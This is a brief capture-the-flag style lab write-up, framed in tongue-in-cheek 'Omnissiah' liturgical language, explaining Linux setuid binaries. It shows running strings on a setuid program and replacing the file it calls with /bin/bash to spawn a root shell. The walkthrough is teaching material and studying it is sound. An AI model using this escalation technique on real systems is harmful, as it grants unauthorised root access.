+++ INITIATING LITURGICAL BROADCAST +++
By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.
What is SETUID?
Setuid is an access right flag which lets an user run a binary with the owner’s permissions.
What does this mean for us? If the owner of whatever is root and for exampe this whatever runs certain commands , we can theoretically tamper it , edit it..
We will precisely be exploring this in the following LAB.
LAB
So the lab’s goal is to get root shell and in the lab environment we have this.
As you can see there is a file called welcome which displays a welcome message , and a greetings file which we can’t execute because well , we are not root.
So i will use strings with welcome to check what it does.
student@target:~$ strings greetings
strings: greetings: Permission denied
student@target:~$ strings welcome
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
greetingsThis is some of the content that strings returned , and as we can observe it executes greetings , I don’t know what greetings does nor which content does it has but I don’t care , I can delete it and substitute it for bash.
cp /bin/bash greetings
Now when we execute welcome , It should spawn a bash session with root privileges.
GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.
+++ LITURGICAL BROADCAST COMPLETE +++